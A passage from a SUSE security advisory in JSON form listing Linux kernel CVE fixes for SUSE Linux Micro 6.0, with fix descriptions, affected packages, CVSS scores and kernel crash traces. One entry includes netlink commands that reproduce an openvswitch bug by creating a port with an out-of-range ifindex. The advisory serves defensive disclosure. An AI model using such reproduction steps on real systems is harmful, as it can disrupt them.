"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: reject negative ifindex\n\nRecent changes in net-next (commit 759ab1edb56c (\"net: store netdevs\nin an xarray\")) refactored the handling of pre-assigned ifindexes\nand let syzbot surface a latent problem in ovs. ovs does not validate\nifindex, making it possible to create netdev ports with negative\nifindex values. It\u0027s easy to repro with YNL:\n\n$ ./cli.py --spec netlink/specs/ovs_datapath.yaml \\\n --do new \\\n\t --json \u0027{\"upcall-pid\": 1, \"name\":\"my-dp\"}\u0027\n$ ./cli.py --spec netlink/specs/ovs_vport.yaml \\\n\t --do new \\\n\t --json \u0027{\"upcall-pid\": \"00000001\", \"name\": \"some-port0\", \"dp-ifindex\":3,\"ifindex\":4294901760,\"type\":2}\u0027\n\n$ ip link show\n-65536: some-port0: \u003cBROADCAST,MULTICAST\u003e mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000\n link/ether 7a:48:21:ad:0b:fb brd ff:ff:ff:ff:ff:ff\n...\n\nValidate the inputs. Now the second command correctly returns:\n\n$ ./cli.py --spec netlink/specs/ovs_vport.yaml \\\n\t --do new \\\n\t --json \u0027{\"upcall-pid\": \"00000001\", \"name\": \"some-port0\", \"dp-ifindex\":3,\"ifindex\":4294901760,\"type\":2}\u0027\n\nlib.ynl.NlError: Netlink error: Numerical result out of range\nnl_len = 108 (92) nl_flags = 0x300 nl_type = 2\n\terror: -34\textack: {\u0027msg\u0027: \u0027integer out of range\u0027, \u0027unknown\u0027: [[type:4 len:36] b\u0027\\x0c\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x03\\x00\\xff\\xff\\xff\\x7f\\x00\\x00\\x00\\x00\\x08\\x00\\x01\\x00\\x08\\x00\\x00\\x00\u0027], \u0027bad-attr\u0027: \u0027.ifindex\u0027}\n\nAccept 0 since it used to be silently ignored.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53843",
"url": "https://www.suse.com/security/cve/CVE-2023-53843"
},
{
"category": "external",
"summary": "SUSE Bug 1254705 for CVE-2023-53843",
"url": "https://bugzilla.suse.com/1254705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53843"
},
{
"cve": "CVE-2023-53844",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53844"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Don\u0027t leak a resource on swapout move error\n\nIf moving the bo to system for swapout failed, we were leaking\na resource. Fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53844",
"url": "https://www.suse.com/security/cve/CVE-2023-53844"
},
{
"category": "external",
"summary": "SUSE Bug 1254649 for CVE-2023-53844",
"url": "https://bugzilla.suse.com/1254649"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53844"
},
{
"cve": "CVE-2023-53846",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53846"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to do sanity check on direct node in truncate_dnode()\n\nsyzbot reports below bug:\n\nBUG: KASAN: slab-use-after-free in f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574\nRead of size 4 at addr ffff88802a25c000 by task syz-executor148/5000\n\nCPU: 1 PID: 5000 Comm: syz-executor148 Not tainted 6.4.0-rc7-syzkaller-00041-ge660abd551f1 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106\n print_address_description.constprop.0+0x2c/0x3c0 mm/kasan/report.c:351\n print_report mm/kasan/report.c:462 [inline]\n kasan_report+0x11c/0x130 mm/kasan/report.c:572\n f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574\n truncate_dnode+0x229/0x2e0 fs/f2fs/node.c:944\n f2fs_truncate_inode_blocks+0x64b/0xde0 fs/f2fs/node.c:1154\n f2fs_do_truncate_blocks+0x4ac/0xf30 fs/f2fs/file.c:721\n f2fs_truncate_blocks+0x7b/0x300 fs/f2fs/file.c:749\n f2fs_truncate.part.0+0x4a5/0x630 fs/f2fs/file.c:799\n f2fs_truncate include/linux/fs.h:825 [inline]\n f2fs_setattr+0x1738/0x2090 fs/f2fs/file.c:1006\n notify_change+0xb2c/0x1180 fs/attr.c:483\n do_truncate+0x143/0x200 fs/open.c:66\n handle_truncate fs/namei.c:3295 [inline]\n do_open fs/namei.c:3640 [inline]\n path_openat+0x2083/0x2750 fs/namei.c:3791\n do_filp_open+0x1ba/0x410 fs/namei.c:3818\n do_sys_openat2+0x16d/0x4c0 fs/open.c:1356\n do_sys_open fs/open.c:1372 [inline]\n __do_sys_creat fs/open.c:1448 [inline]\n __se_sys_creat fs/open.c:1442 [inline]\n __x64_sys_creat+0xcd/0x120 fs/open.c:1442\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nThe root cause is, inodeA references inodeB via inodeB\u0027s ino, once inodeA\nis truncated, it calls truncate_dnode() to truncate data blocks in inodeB\u0027s\nnode page, it traverse mapping data from node-\u003ei.i_addr[0] to\nnode-\u003ei.i_addr[ADDRS_PER_BLOCK() - 1], result in out-of-boundary access.\n\nThis patch fixes to add sanity check on dnode page in truncate_dnode(),\nso that, it can help to avoid triggering such issue, and once it encounters\nsuch issue, it will record newly introduced ERROR_INVALID_NODE_REFERENCE\nerror into superblock, later fsck can detect such issue and try repairing.\n\nAlso, it removes f2fs_truncate_data_blocks() for cleanup due to the\nfunction has only one caller, and uses f2fs_truncate_data_blocks_range()\ninstead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53846",
"url": "https://www.suse.com/security/cve/CVE-2023-53846"
},
{
"category": "external",
"summary": "SUSE Bug 1254983 for CVE-2023-53846",
"url": "https://bugzilla.suse.com/1254983"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53846"
},
{
"cve": "CVE-2023-53847",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53847"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb-storage: alauda: Fix uninit-value in alauda_check_media()\n\nSyzbot got KMSAN to complain about access to an uninitialized value in\nthe alauda subdriver of usb-storage:\n\nBUG: KMSAN: uninit-value in alauda_transport+0x462/0x57f0\ndrivers/usb/storage/alauda.c:1137\nCPU: 0 PID: 12279 Comm: usb-storage Not tainted 5.3.0-rc7+ #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS\nGoogle 01/01/2011\nCall Trace:\n __dump_stack lib/dump_stack.c:77 [inline]\n dump_stack+0x191/0x1f0 lib/dump_stack.c:113\n kmsan_report+0x13a/0x2b0 mm/kmsan/kmsan_report.c:108\n __msan_warning+0x73/0xe0 mm/kmsan/kmsan_instr.c:250\n alauda_check_media+0x344/0x3310 drivers/usb/storage/alauda.c:460\n\nThe problem is that alauda_check_media() doesn\u0027t verify that its USB\ntransfer succeeded before trying to use the received data. What\nshould happen if the transfer fails isn\u0027t entirely clear, but a\nreasonably conservative approach is to pretend that no media is\npresent.\n\nA similar problem exists in a usb_stor_dbg() call in\nalauda_get_media_status(). In this case, when an error occurs the\ncall is redundant, because usb_stor_ctrl_transfer() already will print\na debugging message.\n\nFinally, unrelated to the uninitialized memory access, is the fact\nthat alauda_check_media() performs DMA to a buffer on the stack.\nFortunately usb-storage provides a general purpose DMA-able buffer for\nuses like this. We\u0027ll use it instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53847",
"url": "https://www.suse.com/security/cve/CVE-2023-53847"
},
{
"category": "external",
"summary": "SUSE Bug 1254698 for CVE-2023-53847",
"url": "https://bugzilla.suse.com/1254698"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53847"
},
{
"cve": "CVE-2023-53848",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53848"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd/raid5-cache: fix a deadlock in r5l_exit_log()\n\nCommit b13015af94cf (\"md/raid5-cache: Clear conf-\u003elog after finishing\nwork\") introduce a new problem:\n\n// caller hold reconfig_mutex\nr5l_exit_log\n flush_work(\u0026log-\u003edisable_writeback_work)\n\t\t\tr5c_disable_writeback_async\n\t\t\t wait_event\n\t\t\t /*\n\t\t\t * conf-\u003elog is not NULL, and mddev_trylock()\n\t\t\t * will fail, wait_event() can never pass.\n\t\t\t */\n conf-\u003elog = NULL\n\nFix this problem by setting \u0027config-\u003elog\u0027 to NULL before wake_up() as it\nused to be, so that wait_event() from r5c_disable_writeback_async() can\nexist. In the meantime, move forward md_unregister_thread() so that\nnull-ptr-deref this commit fixed can still be fixed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53848",
"url": "https://www.suse.com/security/cve/CVE-2023-53848"
},
{
"category": "external",
"summary": "SUSE Bug 1254753 for CVE-2023-53848",
"url": "https://bugzilla.suse.com/1254753"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53848"
},
{
"cve": "CVE-2023-53850",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53850"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niavf: use internal state to free traffic IRQs\n\nIf the system tries to close the netdev while iavf_reset_task() is\nrunning, __LINK_STATE_START will be cleared and netif_running() will\nreturn false in iavf_reinit_interrupt_scheme(). This will result in\niavf_free_traffic_irqs() not being called and a leak as follows:\n\n [7632.489326] remove_proc_entry: removing non-empty directory \u0027irq/999\u0027, leaking at least \u0027iavf-enp24s0f0v0-TxRx-0\u0027\n [7632.490214] WARNING: CPU: 0 PID: 10 at fs/proc/generic.c:718 remove_proc_entry+0x19b/0x1b0\n\nis shown when pci_disable_msix() is later called. Fix by using the\ninternal adapter state. The traffic IRQs will always exist if\nstate == __IAVF_RUNNING.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53850",
"url": "https://www.suse.com/security/cve/CVE-2023-53850"
},
{
"category": "external",
"summary": "SUSE Bug 1254677 for CVE-2023-53850",
"url": "https://bugzilla.suse.com/1254677"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53850"
},
{
"cve": "CVE-2023-53851",
"ids": [
{
